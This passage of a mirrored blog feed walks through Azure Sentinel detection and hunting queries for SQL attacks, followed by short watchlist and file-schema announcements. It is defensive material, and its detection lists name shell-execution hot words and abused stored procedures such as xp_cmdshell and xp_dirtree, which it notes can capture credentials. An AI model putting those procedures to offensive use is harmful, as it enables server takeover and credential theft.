<UL> <LI><STRONG>monitoredColumn (values: ‘ResponseRows’, ‘AffectedRows’):</STRONG> Name of the volumetric variable column that is analyzed in the query.</LI> <LI><STRONG>volumeThresholdZ (default value: 3.0):</STRONG> Minimal threshold for relative anomaly score (zScore), which represents the number of standard deviations that the value is above the average. For higher values, the alerts will be triggered only by very significant anomalies. For example, values of 1500 and 900 will both trigger alerts in case of volumeThresholdZ = 3.0, but only 1500 will trigger alert for volumeThresholdZ = 5.0.</LI> <LI><STRONG>volumeThresholdQ (default value: volumeThresholdZ):</STRONG> Minimal threshold for absolute anomaly score (qScore), which represents the number of median ranges that the value is above the 99<SUP>th</SUP> percentile. For higher values, the alerts will be triggered only by very significant anomalies.</LI> <LI><STRONG>volumeThresholdHardcoded (default value: 500):</STRONG> Minimal threshold for actual value of the monitored column that will trigger the alert. For example, in case of default value, only values above it will trigger alerts (in case the other thresholds are passed as well).</LI> <LI><STRONG>detectionWindow (default value: 1h):</STRONG> Size of the recent time window (back from current time). Events in this window will be analyzed for anomalies, and anomalies that are significant (based on thresholds) will appear in the output.</LI> <LI><STRONG>trainingWindow: (default value: detectionWindow + 14d):</STRONG> Window size before the detection window that is used to calculate the metrics for normal behaviour. Events in detection window will be compared with these metrics.</LI> </UL> <P>The standardized data is split to 2 datasets. Training window is a relatively long period of time (14 to 30 days are recommended) which precedes the detection window and is used to learn the normal and expected behaviour on the resource. Basic measures of central tendency (average and median) and dispersion (standard deviation and inter-percentile range) are calculated to model this behaviour.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">trainingSet = processedData | where WindowType == 'training' | summarize AvgVal = round(avg(QuantityColumn), 2) , StdVal = round(stdev(QuantityColumn), 2), N = max(RowNumber) , P99Val = round(percentile(QuantityColumn, 99), 2) , P50Val = round(percentile(QuantityColumn, 50), 2) by Database;</LI-CODE> <P>&nbsp;</P> <P>The detection window is relatively short period (1 to 24 hours are advised) and is used to monitor recent values of the metric. If a recent value is significantly higher than the chosen thresholds, an alert is triggered. By lowering the thresholds, the user can allow for more (less-significant) alerts to be raised.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">processedData | where WindowType == 'detection' | join kind = inner (trainingSet) on Database | extend ZScoreVal = iff(N &gt;= 20, round(todouble(QuantityColumn - AvgVal) / todouble(StdVal + 1), 2), 0.00) , QScoreVal = iff(N &gt;= 20, round(todouble(QuantityColumn - P99Val) / todouble(P99Val - P50Val + 1), 2), 0.00) | extend IsVolumeAnomalyOnVal = iff((ZScoreVal &gt; volumeThresholdZ and QScoreVal &gt; volumeThresholdQ and QuantityColumn &gt; volumeThresholdHardcoded), true, false), AnomalyScore = round((ZScoreVal + QScoreVal)/2, 0) | project TimeGenerated, Database, PrincipalName, ClientIp, HostName, ApplicationName, ActionName, Statement, IsSuccess, ResponseRows, AffectedRows, IsVolumeAnomalyOnVal, AnomalyScore | where IsVolumeAnomalyOnVal == 'true' | sort by AnomalyScore desc, TimeGenerated desc</LI-CODE> <P>&nbsp;</P> <P>The output of the query contains a list of events in detection window that were flagged as anomalous (IsVolumeAnomalyOnVal = ‘true’) by the detection query with the defined parameters, together with AnomalyScore field. Higher AnomalyScore values represent the significance of the anomaly (higher values represent events that are more anomalous).</P> <P>&nbsp;</P> <H3>Detections for Monitored Errors</H3> <P>These detections look for statements or login attempts that fail with specific errors, which might indicate malicious attempts to access or exploit the database. For example, login failures on firewall blocks or credential errors might indicate a malicious attempt to gain access to the database. In some environments, specific errors are expected. &nbsp;To prevent noise in these cases, minimal thresholds for events that trigger the alerts are exposed and can be adapted to raise alert on any relevant event, or only when specific count is reached.</P> <P>Currently, 3 detections of this type are included, looking for different errors (and security scenarios):</P> <P>&nbsp;</P> <OL> <LI><STRONG>ErrorsFirewallStatefulAnomalyOnDatabase:</STRONG> Looks for login attempts that are blocked by existing firewall rules (error 40615). Such events might indicate that unauthorized actor unsuccessfully tried to gain access to the database. This alert is interesting since it can help preventing further attacks on the same target (e.g. coming from a different source).</LI> <LI><STRONG>ErrorsCredentialStatefulAnomalyOnDatabase</STRONG>: Looks for login attempts that failed due to incorrect credentials (error 18456). Such events might indicate that unauthorized actor tried to gain access to the database but didn’t have the correct credential combination. The attempts might continue with different credential sets (Brute Force).</LI> <LI><STRONG>ErrorsSyntaxStatefulAnomalyOnDatabase:</STRONG> Attempts to execute queries that failed on syntax mistakes (errors 102 and 105). The attacker may be unfamiliar with the structure and content of the resource. In such a case, the malicious queries may be malformed (e.g. in case of SQLi) or contains unsupported scripting attempts and will fail on syntax errors.</LI> </OL> <P>&nbsp;</P> <P>The queries share the following parameters:</P> <UL> <LI><STRONG>detectionWindow (default value: 1h):</STRONG> size of the recent time window (as described above)</LI> <LI><STRONG>trainingWindow: (default value: detectionWindow + 14d):</STRONG> training window size before the detection window (as described above).</LI> <LI><STRONG>timeSliceSize (default value: 1h):</STRONG> size of slices into which the data is divided. The number of suspicious failed attempts is calculated per each slice.</LI> <LI><STRONG>monitoredStatementsThreshold (default value: 1):</STRONG> the minimal threshold for monitored failed attempts per slice to be flagged as suspicious. For example, if some amount of credential failures is expected due to human error, this number can be set to 10. In this case, only if 10 or more failures are seen in the slice, alert can be triggered.</LI> <LI><STRONG>trainingSlicesThreshold (default value: 5):</STRONG> the maximal threshold for the number of flagged slices (based on the previous parameters) in the training window. If the number of such slices is above the threshold, the behaviour is considered normal, and no alert will be triggered for the current slice on similar event. If the number is set high (e.g. 1000), all slices with monitored attempts will trigger alerts. If the number is set to 0, alert will be triggered only on first event of the kind.</LI> <LI><STRONG>monitoredErrors (values: (40615) Firewall block failures, (18456) Credential failure errors, (102, 105) Syntax errors):</STRONG> SQL error codes that are monitored for the scenario.</LI> </UL> <P>&nbsp;</P> <P>This detection looks for logins or queries that fail with monitored error codes. Within the training window each time slice (e.g. an hour, as defined by respective parameter) that has above certain value (monitoredStatementsThreshold parameter) of errors is flagged. For example, we can count each slice that has more than 5 errors.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">let trainingSet = processedData | where WindowType == 'training' | summarize countSlicesWithErrors = dcountif(timeSlice, countStatementsWithError &gt;= monitoredStatementsThreshold) by Database; processedData | where WindowType == 'detection' | join kind = inner (trainingSet) on Database | extend IsErrorAnomalyOnStatement = iff(((countStatementsWithError &gt;= monitoredStatementsThreshold) and (countSlicesWithErrors &lt;= trainingSlicesThreshold)), true, false), anomalyScore = round(countStatementsWithError/monitoredStatementsThreshold, 0) | where IsErrorAnomalyOnStatement == 'true' | sort by anomalyScore desc, timeSlice desc</LI-CODE> <P>&nbsp;</P> <P>The alert is triggered if the detection window contains events with monitored error code, whilst the number of flagged slices within training window is below threshold (trainingSlicesThreshold parameter). The latter logic helps control the number of alerts, especially in environments where such behavior is expected and common.</P> <P>The output of the query contains a list of events in detection window that were flagged as anomalous and the AnomalyScore, as described above.</P> <P>&nbsp;</P> <P>The output of the query contains a list of events in detection window that were flagged as anomalous (IsVolumeAnomalyOnVal = ‘true’) by the detection query with the defined parameters, together with AnomalyScore field. Higher AnomalyScore values represent the significance of the anomaly (higher values represent events that are more anomalous).</P> <P>&nbsp;</P> <H3>Detections for Monitored "Hot Words"</H3> <P>These detections look for statements that include hot words that might indicate attempts to execute malicious code. For example, shell commands (e.g. using the ‘xp_cmdshell’ procedure) can be used to run malicious scripts. These attempts might be successful or blocked, depending on SQL version and settings.</P> <P>&nbsp;</P> <P>Currently, 5 detections of this type are included, covering different scenarios:</P> <P>&nbsp;</P> <OL> <LI><STRONG>HotwordsDropStatefulAnomalyOnDatabase:</STRONG> Looks for statements that drop resources (tables or databases). This might indicate that a malicious actor attempts to delete valuable data and disrupt business activity.</LI> <LI><STRONG>HotwordsExecutionStatefulAnomalyOnDatabase:</STRONG> Looks for attempts to run shell commands or scripts via SQL. This could indicate an attempt to download malware, run malicious processes (e.g. mining). Even if shell execution is disabled, this might indicate that a malicious agent gained access to SQL server and makes blind attempts.</LI> <LI><STRONG>HotwordsFirewallRuleStatefulAnomalyOnDatabase: </STRONG>Looks for attempts to change or delete firewall rules. Since tight firewall rules hinder potential attacks, malicious user might change them in order to pave the way for persistent attacks in the future.</LI> <LI><STRONG>HotwordsOLEObjectStatefulAnomalyOnDatabase:</STRONG> Looks for attempts to create or use OLE objects, which can be used as part of persistent attack scenario.</LI> <LI><STRONG>HotwordsOutgoingStatefulAnomalyOnDatabase:</STRONG> Looks for attempts to access external websites or resources. These might be used in attack scenarios to download malware or contact command and control centers during the attack.</LI> </OL> <P>The queries share the following parameters:</P> <P>&nbsp;</P> <UL> <LI><STRONG>detectionWindow (default value: 1h):</STRONG> size of the recent time window (as described above)</LI> <LI><STRONG>trainingWindow: (default value: detectionWindow + 14d):</STRONG> training window size before the detection window (as described above).</LI> <LI><STRONG>timeSliceSize (default value: 1h):</STRONG> size of slices into which the data is divided (as described above).</LI> <LI><STRONG>MonitoredStatementsThreshold (default value: 1):</STRONG> the minimal threshold for statements with monitored hot words per slice to be flagged as suspicious (as described above).</LI> <LI><STRONG>trainingSlicesThreshold (default value: 5):</STRONG> the maximal threshold for the number of flagged slices&nbsp; in the training window (as described above).</LI> <LI><STRONG>Hot words:</STRONG> <UL> <LI><STRONG>('drop table', 'drop database’):</STRONG> Dropping tables or databases</LI> <LI><STRONG>('xp_cmdshell', 'ps.exe', 'powershell', 'cmd.exe', 'msiexec', '&lt;script&gt;’):</STRONG> Shell command executions</LI> <LI><STRONG>('http:', 'https:', 'ftp:', 'onion.pet’):</STRONG> Outgoing connections to external websites</LI> <LI><STRONG>('sp_set_firewall_rule', 'sp_set_database_firewall_rule', 'sp_delete_database_firewall_rule', 'sp_delete_firewall_rule', 'sys.firewall_rules', 'sys.database_firewall_rules’):</STRONG> Firewall rule tampering</LI> <LI><STRONG>('sp_oamethod', 'sp_oacreate', 'sp_oasetproperty’): </STRONG>OLE object manipulation</LI> </UL> </LI> </UL> <P>&nbsp;</P> <P>The detection logic is like the monitored errors detection. Time slices containing monitored hot words in the training window are flagged. When the detection window contains such words but the number of flagged slices in training period is below threshold, an alert is triggered.</P> <P>&nbsp;</P> <H2>Hunting Queries</H2> <P>Hunting queries are designed for use in active threat hunts. Most threat hunting queries will require some amount of manual tuning, but this allows threat hunters to detect activity that may fall below detection baselines.&nbsp;</P> <P>&nbsp;</P> <P>These hunting queries will focus on exploring the abuse of applications that communicate directly with SQL like web applications, management software and accounting software. Focussing on application activity allows us to establish predicable patterns of interaction with the database. These predictable behaviours will provide loose baselines for our hunting queries.</P> <P>&nbsp;</P> <P>We can roughly identify SQL applications by grouping using the ApplicationName and PrincipalName columns. This will provide combinations of applications with associated accounts, roughly mapping to each application in use.</P> <P>&nbsp;</P> <P>Each hunting query is built on top of a standard normalisation described above. For brevity each individual query will not include this normalisation step, however complete queries can be found within the Azure Sentinel SQL solution.</P> <P>&nbsp;</P> <H3>Affected Row Anomaly</H3> <P>Azure for SQL diagnostic logging provide us with the column affected_rows_d. This column contains a count of the rows that were impacted by the SQL query.</P> <P>&nbsp;</P> <P>In a real-world scenario, the attacker may attempt to dump the database schema, drop the table, or overwrite data in the database. Each of these commands would result in the query that was exploits returning an unusually high number of rows when compared to normal database operation.</P> <P>&nbsp;</P> <P>Using our processed data, we can create a simple query which calculates the total number of operations for a given SQL application and then calculate the prevalence for each query executed. We can then tune to query to return only queries that represent the top 1% of affected row counts.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">let threshold = 1; let totals = processedData | summarize count() by PrincipalName, ApplicationName | extend joinKey = strcat(PrincipalName, ApplicationName) | project joinKey, count_; processedData //Count the total number of times each number of rows was accessed | summarize count() by AffectedRows, PrincipalName, ApplicationName | extend joinKey = strcat(PrincipalName, ApplicationName) | join kind=leftouter ( totals ) on joinKey | extend prevalence = round(toreal(count_) / toreal(count_1) * 100, 2) | where prevalence &lt;= threshold </LI-CODE> <P>&nbsp;</P> <P>By using affected row prevalence, the query can detect not only outliers from normal operation with a high number of affected rows, but also outliers with low affected row counts. An abnormally low number of affected rows may be indicative of manual SQL injection or SQL reconnaissance activity.</P> <P>&nbsp;</P> <H3>Execution Time Anomaly</H3> <P>As explored earlier, time-based SQLi is a reconnaissance technique that uses SQL commands to purposely delay execution. It is also common for SQLi attacks to result in longer execution times than normal, this is because the attack may introduce additional processing.</P> <P>&nbsp;</P> <P>This hunting query uses the Kusto <A href="#" target="_blank" rel="noopener">series_decompose_anomalies</A> function to detect queries that are executed in an anomalous amount of time. The following Kusto is used to prepare the processed data so that series_decompose_anomalies can be executed across it.</P> <P>&nbsp;</P> <P>First, the query will summarise all SQL query operations by each user into 1-hour bins. The query will then summarise the average duration of the query grouping on user and application to provide a list of query durations.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">processedData //Bin the data into 1h windows, taking the average of exeuction time | summarize round(avg(DurationMs), 2), min(TimeGenerated), max(TimeGenerated) by PrincipalName, ApplicationName, bin(TimeGenerated, timeSliceSize) //Summarise by user and application and create list ready for anomaly detection | summarize make_list(avg_DurationMs), make_list(min_TimeGenerated), make_list(max_TimeGenerated) by PrincipalName, ApplicationName</LI-CODE> <P>&nbsp;</P> <P>With the data prepared, series_decompose_anomalies can be applied to the list of durations to detect outliers. This will identify hours where the average query duration increases, providing us with periods of time where possible time based SQLi could have occurred.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">| extend series_decompose_anomalies(list_avg_DurationMs, scoreThreshold, -1, 'linefit')</LI-CODE> <P>&nbsp;</P> <P>Finally, the query will expand the results of series_decompose_anomalies and re-join them with the original query.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">| mv-expand TimeAnomaly=series_decompose_anomalies_list_avg_DurationMs_ad_flag, WindowStart=list_min_TimeGenerated, WindowEnd=list_max_TimeGenerated | project WindowStart, WindowEnd, PrincipalName, ApplicationName, TimeAnomaly | where TimeAnomaly == 1 //Split the query here to see raw anomaly results //The next section will re-join back to the SQL diagnostics data to //display the queries executed within the anomalous windows identified | extend joinKey = strcat(PrincipalName, ApplicationName) | join kind=leftouter ( processedData | project ApplicationName, PrincipalName, Statement, TimeGenerated, DurationMs | extend joinKey = strcat(PrincipalName, ApplicationName) ) on joinKey | where TimeGenerated between (todatetime(WindowStart) .. todatetime(WindowEnd)) | project TimeGenerated, TimeAnomaly, WindowStart, WindowEnd, PrincipalName, ApplicationName, Statement, DurationMs, ResourceId, ClientIp, HostName | order by DurationMs desc</LI-CODE> <P>&nbsp;</P> <P>The resolution and the anomaly decompose threshold can both be configured. The anomaly threshold allows you to control how strong the anomaly must be before a result is returned, increasing this value will effectively make the query less sensitive to minor fluctuations.</P> <P>&nbsp;</P> <H3>Boolean Blind SQLi</H3> <P>As covered earlier in the post, Boolean blind SQLi is one of the most common SQL injection reconnaissance techniques and is often used by automated database takeover tools.</P> <P>&nbsp;</P> <P>This hunting query will process the SQL statement to extract both sides of a Boolean expression. The query will first identify SQL statements with an “=” are part of their structure. A regular expression is then used to extract either side of the “=”, the result of this is stored as the right and left side of the query.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">let queryData = processedData | where Statement contains "=" | extend extract_equals = extract_all(@"([a-zA-Z0-9\-\']+\s?=\s?[a-zA-Z0-9\-\']+)", Statement) | where isnotempty(extract_equals) | mv-expand extract_equals | extend left = tostring(split(extract_equals, "=", 0)[0]) | extend right = tostring(split(extract_equals, "=", 1)[0]);</LI-CODE> <P>&nbsp;</P> <P>We then need to separate instances where the left and right side of the statement is wrapped in quotation marks, using a regular expression to handle parsing the correct portion of the statement.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">let cleanData = queryData | where left !has "'" and right !has "'"; //Data has a quote in both sides, we need to parse this properly //We only care when the query is balanced e.g. '1'='1', so both sides will have a quote //This allows us to drop some results early let quoteData = queryData | where left has "'" and right has "'" | extend extract_equals = extract_all(@"(\'.+\'\s?=\s?\'.+\')", Statement) | extend left = tostring(split(extract_equals, "=", 0)[0]) | extend right = tostring(split(extract_equals, "=", 1)[0]);</LI-CODE> <P>&nbsp;</P> <P>Finally, after processing, we can check to see if the SQL statement contained a balanced parameter by comparing the right and left side of the “=”.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">cleanData | union quoteData | where left == right | extend alertText = strcat(left, "=", right) | summarize AlertText=make_list(alertText) by TimeGenerated, Database, ClientIp, PrincipalName, Statement, ApplicationName, ResourceId</LI-CODE> <P>&nbsp;</P> <H3>&nbsp;</H3> <H3>Prevalence Based Query Size Anomaly</H3> <P>SQL injection will usually result in more parameters being added into the query. It is normal not possible for the attacker to remove existing parameters which are used by the legitimate page that is being exploited. As parameters will be appended to an existing query, it’s possible to baseline and then detect unusual numbers of parameters for a given user and application combination.</P> <P>&nbsp;</P> <P>This query uses a prevalence calculation to identify queries that have an unusual number of parameters for a given application and user. First the number of queries for each user and application group is calculated, this is stored as the total count of the overall prevalence of each query size can be calculated later.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">let total = processedData | summarize count() by PrincipalName, ApplicationName | extend key = strcat(PrincipalName, ApplicationName);</LI-CODE> <P>&nbsp;</P> <P>Next, the query splits the query up using “=” and a space as delimiters. Roughly each “=” indicates an SQL parameter whilst each space represents a new token, or query component. The query will then summarise to count the number of tokens based on the username, application, and number of tokens. This provides us with counts for each unique number of tokens based on the username and password.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">let anomalyData = processedData //Splitting on "=" provides a good estimate to the parameters | extend parameters = countof(Statement, "=") //Splitting on space provides a good estimate to the tokens in the query | extend tokens = array_length(split(Statement, " ")) | summarize count(), make_set(parameters), make_list(TimeGenerated), make_list(ClientIp), dcount(ClientIp), min(TimeGenerated), max(TimeGenerated), make_list(Statement) by tokens, PrincipalName, ApplicationName</LI-CODE> <P>&nbsp;</P> <P>Now that we have the total number of queries executed by each username and application, we can calculate the prevalence for each number of tokens observed. If that number of tokens represents less than 10% of the total queries executed, a row will be returned.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">| extend key = strcat(PrincipalName, ApplicationName) | join kind=leftouter (total) on key | extend prevalence = toreal(count_) / toreal(count_1) * 100 | where prevalence &lt;= prevalenceThreshold</LI-CODE> <P>&nbsp;</P> <P>SQL applications, especially those that have pre-defined database interactions, generally produce consistent outcomes this query can help to flag anomalies where an unusual number of tokens were observed. There are limitations to this hunting query, if the attacker uses the same number of tokens as a legitimate function, no result will be returned. This query also needs application behaviour to be predictable and is most effective with applications such as content management systems and other web applications.</P> <P>&nbsp;</P> <P>The query that is bundled as part of the SQL solution also allows additional filtering; this includes the ability to detect anomalies that only occurred on a single day.</P> <P>&nbsp;</P> <H3>Time Based Query Size Anomaly</H3> <P>This hunting query uses a similar mechanism to the Prevalence based query size anomaly, however, instead of using prevalence to detect outliers, this query uses series_decompose_anomalies to detect spikes in the number of parameters or token for a given day of the week.</P> <P>First the query needs to prepare data for the series_decompose_anomalies function. Data is summarized into 1-day bins whilst calculating the average number of tokens and parameters for that window. The data is then summarized using the username an application name to create lists of token and parameter averages.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">processedData //Splitting on "=" provides a good estimate to the number of parameters in the query | extend parameters = countof(Statement, "=") //Splitting on space provides a good estimate to the tokens in the query | extend tokens = array_length(split(Statement, " ")) //Bin the data into 1 day windows, taking the average of tokens and parameters for that user and application during the period | summarize round(avg(tokens), 2), round(avg(parameters),2), min(TimeGenerated), max(TimeGenerated) by PrincipalName, ApplicationName, bin(TimeGenerated, resolution) //Summarise by user and application and create lists ready for anomaly detection | summarize make_list(avg_tokens), make_list(avg_parameters), make_list(min_TimeGenerated), make_list(max_TimeGenerated) by PrincipalName, ApplicationName</LI-CODE> <P>&nbsp;</P> <P>With the prepared data we can call series_decompose_anomalies to identify anomalies in the number of tokens and parameters for a given day. We will then keep results where a positive or negative anomaly is detected (too few or too many tokens for that day when compared to the baseline). It’s also important to record the start and end time of this activity so that we know when the anomaly occurred.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">| extend series_decompose_anomalies(list_avg_tokens, scoreThreshold, -1, 'linefit'), series_decompose_anomalies(list_avg_parameters, scoreThreshold, -1, 'linefit') | mv-expand TokenAnomaly=series_decompose_anomalies_list_avg_tokens_ad_flag, ParameterAnomaly=series_decompose_anomalies_list_avg_parameters_ad_flag, WindowStart=list_min_TimeGenerated, WindowEnd=list_max_TimeGenerated | project WindowStart, WindowEnd, PrincipalName, ApplicationName, TokenAnomaly, ParameterAnomaly //Enable to detect SQL statement token anomalies | where TokenAnomaly == 1 or TokenAnomaly == -1</LI-CODE> <P>&nbsp;</P> <P>Finally, the query will create a join key using the username and application name to re-join back to the original dataset. The start and end times recorded earlier can now be used to surface results within the time window of the anomaly.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">| extend joinKey = strcat(PrincipalName, ApplicationName) | join kind=leftouter ( processedData | project ApplicationName, PrincipalName, Statement, TimeGenerated | extend joinKey = strcat(PrincipalName, ApplicationName) ) on joinKey | where TimeGenerated between (todatetime(WindowStart) .. todatetime(WindowEnd)) | extend Parameters = countof(Statement, "=") | extend Tokens = array_length(split(Statement, " ")) | project TimeGenerated, ParameterAnomaly, Parameters, TokenAnomaly, Tokens, WindowStart, WindowEnd, PrincipalName, ApplicationName, Statement | order by Tokens desc, Parameters desc</LI-CODE> <P>&nbsp;</P> <P>The results returned will represent activity occurring with an unusual number of tokens and parameters for that given time of day.</P> <P>&nbsp;</P> <H3>Suspicious Stored Procedures</H3> <P>Using the MSTIC sensor network, MSTIC can observe the most used commands by attackers when they gain access to an SQL database. Using this information, this hunting query will show SQL queries that contain the most abused SQL stored procedures.</P> <P>&nbsp;</P> <LI-CODE lang="csharp">let abusedProcedures = dynamic(["xp_cmdshell", "xp_regwrite", "xp_regdeletekey", "xp_regdeletevalue", "xp_dirtree", "xp_fileexist", "xp_msver", "xp_makecab", "xp_sqlshell", "xp_fixeddrivesd", "xp_regread", "sp_configure", "sp_oacreate", "sp_password", "sp_OACreate", "sp_addextendedproc", "sp_dropextendedproc", "sp_makewebtask", "sp_delete", "SP_OAcreate", "sp_OADestroy"]); AzureDiagnostics | where Category =~ "SQLSecurityAuditEvents" | where statement_s has_any (abusedProcedures) | project TimeGenerated, SubscriptionId, ResourceId, ClientIp=client_ip_s, PrincipalName=session_server_principal_name_s, statement_s, action_id_s, HostName=host_name_s, ApplicationName=application_name_s</LI-CODE> <P>&nbsp;</P> <P>The of the above commands are often abused as they allow attackers to progress their access from only the SQL database onto the underlying server. Executing command line, manipulating registry keys, and performing directory traversal are all key components to successful onward exploitation.</P> <P>&nbsp;</P> <P>Commands such as" xp_dirtree" can be exploited to <A href="#" target="_blank" rel="noopener">allow attackers to capture MSSQL credentials</A>. This is especially useful if the attacker only has access via SQLi through a web application as it grants them direct database access. Credentials may also be reused to access other systems in the network.</P> <P>&nbsp;</P> <P>All the above procedures are <STRONG>not supported on Azure SQL Databases</STRONG>. This is because Azure SQL Databases run in a shared environment. Presence of these commands in Azure SQL Database logging likely indicates random attempts if your database is exposed to the open internet.</P> <P>&nbsp;</P> <P>If you are running your own SQL server it is recommended that you disabled commands that are not in use. Many of these commands are disabled by default.</P> <P>&nbsp;</P> <P><STRONG>First you must enable advanced options:</STRONG></P> <P>&nbsp;</P> <LI-CODE lang="sql">EXEC sp_configure 'show advanced options', 1 RECONFIGURE</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Then you can disable the chose procedure, for example:</STRONG></P> <P>&nbsp;</P> <LI-CODE lang="sql">EXEC sp_configure 'xp_dirtree', 0 RECONFIGURE</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>If you leave any of these procedures enabled a trap should be set in your SIEM for when they are executed.</P> <P>&nbsp;</P> <H2>Conclusion</H2> <P>The Azure Sentinel SQL solution allows security analysts and administrators to rapidly deploy a range of detection and hunting queries to their Azure Sentinel environment. As you have seen, there are numerous ways that SQL attacks can be detected. The ever-changing security landscape means it’s not always possible to detect attacks with a single query. It’s important to develop diverse detection and hunting queries using numerous novel approaches to provide the best possible visibility of SQL attacks.</P> <P>&nbsp;</P> <P>We hope this blog post has provided insight into how our detection and hunting queries work, and we are excited to see new Hunting and Detection queries built by the community.</P> <P>&nbsp;</P> <P>All the queries in this post can be found in-full within the Azure Sentinel SQL solution. Additional hunting and detection queries written for Azure Sentinel can be found on the <A href="#" target="_blank" rel="noopener">Azure Sentinel GitHub</A>.</P> Mon, 09 Aug 2021 17:20:47 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-sql-solution-query-deep-dive/ba-p/2597961 TomMcElroy 2021-08-09T17:20:47Z What's new: Watchlists templates are now in public preview! https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-watchlists-templates-are-now-in-public-preview/ba-p/2614340 <P>As we know, each organization is unique and have different use cases and scenarios in mind when it come to security operations. Nevertheless we've identified several use cases that are common across many SOC teams.</P> <P>&nbsp;</P> <P>Azure Sentinel now provides built-in watchlist templates, which you can customize for your environment and use during investigations.</P> <P>After those watchlists are populated with data, you can correlate that data with analytics rules, view it in the entity pages and investigation graphs as insights, create custom uses such as to track VIP or sensitive users, and more.</P> <P>&nbsp;</P> <P>Watchlist templates currently include:</P> <UL> <LI><STRONG>VIP Users</STRONG>. A list of user accounts of employees that have high impact value in the organization.</LI> <LI><STRONG>Terminated Employees</STRONG>. A list of user accounts of employees that have been, or are about to be, terminated.</LI> <LI><STRONG>Service Accounts</STRONG>. A list of service accounts and their owners.</LI> <LI><STRONG>Identity Correlation</STRONG>. A list of related user accounts that belong to the same person.</LI> <LI><STRONG>High Value Assets</STRONG>. A list of devices, resources, or other assets that have critical value in the organization.</LI> <LI><STRONG>Network Mapping</STRONG>. A list of IP subnets and their respective organizational contexts.</LI> </UL> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="image.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/300686iF747E4AA6BE1BAE0/image-size/large?v=v2&amp;px=999" role="button" title="image.png" alt="Watchlists templates insights in entity pages" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Watchlists templates insights in entity pages</span></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>We've created the watchlists templates <A href="#" target="_self">schemas</A>&nbsp;to be super easy and extensible, in order for you to populate it with the relevant data. more information about using the watchlists templates can be found <A href="#" target="_self">here</A>.</P> <P>&nbsp;</P> <P><FONT size="6">What’s next?</FONT></P> <P><STRONG>&nbsp;</STRONG></P> <P>Beside surfacing the watchlists templates data inside the entity pages, we're working on embedding this information in the UEBA anomalies, and the entity risk score which is planned next. Understanding if a user is a VIP/Terminated or an asset is an HVA is important to provide both context and security value for the analyst while investigating.</P> <P>&nbsp;</P> <P>We Value Your Opinion!</P> <P>Our goal is to make your life easier while you investigate security incidents. If you have any feedback – about the experience, the usage – or anything else,</P> <P>Please let us know! We aim to improve&nbsp;<img class="lia-deferred-image lia-image-emoji" src="https://techcommunity.microsoft.com/html/@B71AFCCE02F5853FE57A20BD4B04EADDhttps://techcommunity.microsoft.com/images/emoticons/cool_40x40.gif" alt=":cool:" title=":cool:" /></P> <P>&nbsp;</P> <P>&nbsp;</P> Fri, 06 Aug 2021 09:32:45 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-watchlists-templates-are-now-in-public-preview/ba-p/2614340 Itay Argoety 2021-08-06T09:32:45Z What's new: ASIM File Activity schema https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-asim-file-activity-schema/ba-p/2609732 <P>Hello everyone,</P> <P>&nbsp;</P> <P>Continuing our&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-asim-authentication-process-registry-and-enhanced/ba-p/2502268" target="_blank" rel="noopener">normalization journey</A>, we now add the <A href="#" target="_self">file activity schema</A>.</P> <P>&nbsp;</P> <P><STRONG><A href="#" target="_self">Retweet</A>, <A href="#" target="_self">Re-share on LinkedIn</A></STRONG></P> <P>&nbsp;</P> <H2>Why should you care?</H2> <P>&nbsp;</P> <TABLE border="0" width="100%"> <TBODY> <TR> <TD width="50%" style="border-style: none; width: 40%;"> <P><SPAN data-preserver-spaces="true">In addition to ASIM advantages: cross source analytics, source agnostic rules, and ease of use, the File Activity Schema lets you write rules that span endpoint, server, and cloud activity. We have included parsers for&nbsp;</SPAN><STRONG><SPAN data-preserver-spaces="true">Sysmon, Microsoft 365 Defender for Endpoint, SharePoint, OneDrive, and Azure Storage</SPAN></STRONG><SPAN data-preserver-spaces="true">. For example:</SPAN></P> <P><SPAN data-preserver-spaces="true">&nbsp;</SPAN></P> <UL> <LI><SPAN data-preserver-spaces="true">Analyzing file activity is instrumental for ransomware detection. Now your on-prem ransomware analytics can secure cloud workloads.</SPAN></LI> </UL> <P><SPAN data-preserver-spaces="true">&nbsp;</SPAN></P> <UL> <LI><SPAN data-preserver-spaces="true">When looking for malware leftovers, you will find them on the affected endpoints&nbsp;</SPAN><STRONG><SPAN data-preserver-spaces="true">and&nbsp;</SPAN></STRONG><SPAN data-preserver-spaces="true">on cloud services that may have served to spread them.</SPAN></LI> </UL> </TD> <TD width="50%" style="border-style: none; width: 60%;"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Ofer_Shezaf_0-1628077271391.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/300420iA7280CF8422A727D/image-size/large?v=v2&amp;px=999" role="button" title="Ofer_Shezaf_0-1628077271391.png" alt="Ofer_Shezaf_0-1628077271391.png" /></span></TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <H2>Learn more</H2> <P>&nbsp;</P> <P>Read more about <A href="#" target="_blank" rel="noopener">Azure Sentinel Information Model</A> and the <A href="#" target="_blank" rel="noopener">File Activity 